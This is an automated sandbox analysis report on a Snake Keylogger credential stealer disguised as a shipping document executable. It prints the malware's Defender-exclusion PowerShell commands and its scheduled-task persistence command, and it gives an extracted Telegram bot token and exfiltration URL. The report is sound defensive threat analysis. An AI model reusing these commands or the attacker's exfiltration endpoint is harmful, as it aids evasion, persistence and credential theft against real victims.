Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HBL NO C-ACC-250002.exe

Overview

General Information

Sample name:HBL NO C-ACC-250002.exe
Analysis ID:1631593
MD5:bcc88695eb4028e33671f80ec957a01a
SHA1:67564ac4019e2fde2e083d00f7effc5c63d48605
SHA256:0231d2d9b4bc4935dd4eed396ec39b0a6ed73bf239ccb2a049424175e42b42ce
Tags:exeSnakeKeyloggeruser-cocaman
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • HBL NO C-ACC-250002.exe (PID: 2164 cmdline: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe" MD5: BCC88695EB4028E33671F80EC957A01A)
    • powershell.exe (PID: 6580 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2820 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6524 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HBL NO C-ACC-250002.exe (PID: 1960 cmdline: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe" MD5: BCC88695EB4028E33671F80EC957A01A)
  • uyDicX.exe (PID: 5144 cmdline: C:\Users\user\AppData\Roaming\uyDicX.exe MD5: BCC88695EB4028E33671F80EC957A01A)
    • schtasks.exe (PID: 3060 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • uyDicX.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Roaming\uyDicX.exe" MD5: BCC88695EB4028E33671F80EC957A01A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendMessage?chat_id=5649235024", "Token": "7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0", "Chat_id": "5649235024", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.4499608217.0000000002F9C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000009.00000002.4499894132.0000000002D1E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        0000000E.00000002.4499608217.0000000003002000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          00000009.00000002.4499894132.0000000002D84000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 35 entries
            SourceRuleDescriptionAuthorStrings
            0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x12c5d:$a1: get_encryptedPassword
                • 0x12f49:$a2: get_encryptedUsername
                • 0x12a69:$a3: get_timePasswordChanged
                • 0x12b64:$a4: get_passwordField
                • 0x12c73:$a5: set_encryptedPassword
                • 0x1430c:$a7: get_logins
                • 0x1426f:$a10: KeyLoggerEventArgs
                • 0x13eda:$a11: KeyLoggerEventArgsEventHandler
                0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x1a630:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x19862:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x19c95:$a4: \Orbitum\User Data\Default\Login Data
                • 0x1acd4:$a5: \Kometa\User Data\Default\Login Data
                0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
                • 0x13850:$s1: UnHook
                • 0x13857:$s2: SetHook
                • 0x1385f:$s3: CallNextHook
                • 0x1386c:$s4: _hook
                Click to see the 41 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ProcessId: 6580, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ProcessId: 6580, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uyDicX.exe, ParentImage: C:\Users\user\AppData\Roaming\uyDicX.exe, ParentProcessId: 5144, ParentProcessName: uyDicX.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp", ProcessId: 3060, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", ProcessId: 6524, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ProcessId: 6580, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe", ParentImage: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe, ParentProcessId: 2164, ParentProcessName: HBL NO C-ACC-250002.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp", ProcessId: 6524, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T11:45:24.116190+010028033053Unknown Traffic192.168.2.549713104.21.64.1443TCP
                2025-03-07T11:45:25.538337+010028033053Unknown Traffic192.168.2.549714104.21.64.1443TCP
                2025-03-07T11:45:34.298849+010028033053Unknown Traffic192.168.2.549736104.21.64.1443TCP
                2025-03-07T11:45:38.462067+010028033053Unknown Traffic192.168.2.549751104.21.64.1443TCP
                2025-03-07T11:45:41.708409+010028033053Unknown Traffic192.168.2.549760104.21.64.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T11:45:18.923663+010028032742Potentially Bad Traffic192.168.2.549706193.122.6.16880TCP
                2025-03-07T11:45:20.621341+010028032742Potentially Bad Traffic192.168.2.549709193.122.6.16880TCP
                2025-03-07T11:45:21.761949+010028032742Potentially Bad Traffic192.168.2.549706193.122.6.16880TCP
                2025-03-07T11:45:23.262099+010028032742Potentially Bad Traffic192.168.2.549709193.122.6.16880TCP
                2025-03-07T11:45:24.824456+010028032742Potentially Bad Traffic192.168.2.549715193.122.6.16880TCP
                2025-03-07T11:45:26.246339+010028032742Potentially Bad Traffic192.168.2.549717193.122.6.16880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T11:45:51.541969+010028530061A Network Trojan was detected192.168.2.549785149.154.167.220443TCP
                2025-03-07T11:45:52.798286+010028530061A Network Trojan was detected192.168.2.549786149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T11:45:50.908492+010018100081Potentially Bad Traffic192.168.2.549785149.154.167.220443TCP
                2025-03-07T11:45:52.004507+010018100081Potentially Bad Traffic192.168.2.549786149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: HBL NO C-ACC-250002.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeAvira: detection malicious, Label: TR/AD.SnakeStealer.njjud
                Source: 0000000E.00000002.4499608217.0000000002D41000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendMessage?chat_id=5649235024", "Token": "7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0", "Chat_id": "5649235024", "Version": "5.1"}
                Source: HBL NO C-ACC-250002.exe.1960.9.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0/sendMessage"}
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeReversingLabs: Detection: 44%
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeVirustotal: Detection: 55%Perma Link
                Source: HBL NO C-ACC-250002.exeVirustotal: Detection: 43%Perma Link
                Source: HBL NO C-ACC-250002.exeReversingLabs: Detection: 44%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpackString decryptor:
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpackString decryptor: 7895118317:AAGrVh3BGkPztPIw30H4HXBbPxYmBtMiKV0
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpackString decryptor: 5649235024

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: HBL NO C-ACC-250002.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49711 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49712 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49785 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49786 version: TLS 1.2
                Source: HBL NO C-ACC-250002.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 07343206h0_2_07342AB3
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 00E4F1F6h9_2_00E4F007
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 00E4FB80h9_2_00E4F007
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_00E4E528
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_00E4EB5B
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h9_2_00E4ED3C
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 05091A38h9_2_05091620
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 05091471h9_2_050911C0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 050902F1h9_2_05090040
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 05091011h9_2_05090D60
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509F009h9_2_0509ED60
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509C041h9_2_0509BD98
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509DEA9h9_2_0509DC00
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 05090751h9_2_050904A0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509E759h9_2_0509E4B0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509B791h9_2_0509B4E8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509DA51h9_2_0509D7A8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509F8B9h9_2_0509F610
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 05091A38h9_2_05091610
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509C8F1h9_2_0509C648
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509D1A1h9_2_0509CEF8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509EBB1h9_2_0509E908
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 05090BB1h9_2_05090900
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509BBE9h9_2_0509B940
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 05091A38h9_2_05091966
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509F461h9_2_0509F1B8
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509C499h9_2_0509C1F0
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509E301h9_2_0509E058
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509D5F9h9_2_0509D350
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509FD11h9_2_0509FA68
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeCode function: 4x nop then jmp 0509CD49h9_2_0509CAA0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 02B4F1F6h14_2_02B4F007
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 02B4FB80h14_2_02B4F007
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_02B4E528
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_02B4EB5B
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_02B4ED3C
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057B1011h14_2_057B0D60
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BF009h14_2_057BED60
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057B1A38h14_2_057B1966
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BBBE9h14_2_057BB940
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BEBB1h14_2_057BE908
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057B0BB1h14_2_057B0900
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BC499h14_2_057BC1F0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057B1471h14_2_057B11C0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BF461h14_2_057BF1B8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BC041h14_2_057BBD98
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BE301h14_2_057BE058
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057B02F1h14_2_057B0040
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BDEA9h14_2_057BDC00
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BB791h14_2_057BB4E8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BE759h14_2_057BE4B0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057B0751h14_2_057B04A0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BD5F9h14_2_057BD350
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BDA51h14_2_057BD7A8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BFD11h14_2_057BFA68
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BC8F1h14_2_057BC648
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057B1A38h14_2_057B1620
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BF8B9h14_2_057BF610
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BD1A1h14_2_057BCEF8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 057BCD49h14_2_057BCAA0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06998945h14_2_06998608
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06996171h14_2_06995EC8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_069936CE
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 069958C1h14_2_06995618
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06995D19h14_2_06995A70
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_069933B8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]14_2_069933A8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06996E79h14_2_06996BD0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 069965C9h14_2_06996320
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06996A21h14_2_06996778
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06990741h14_2_06990498
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06997751h14_2_069974A8
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06990B99h14_2_069908F0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 069972FAh14_2_06997050
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 069902E9h14_2_06990040
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06995441h14_2_06995198
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06998459h14_2_069981B0
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06997BA9h14_2_06997900
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06998001h14_2_06997D58
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeCode function: 4x nop then jmp 06990FF1h14_2_06990D48

                Networking

                barindex
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49785 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49786 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49785 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49786 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
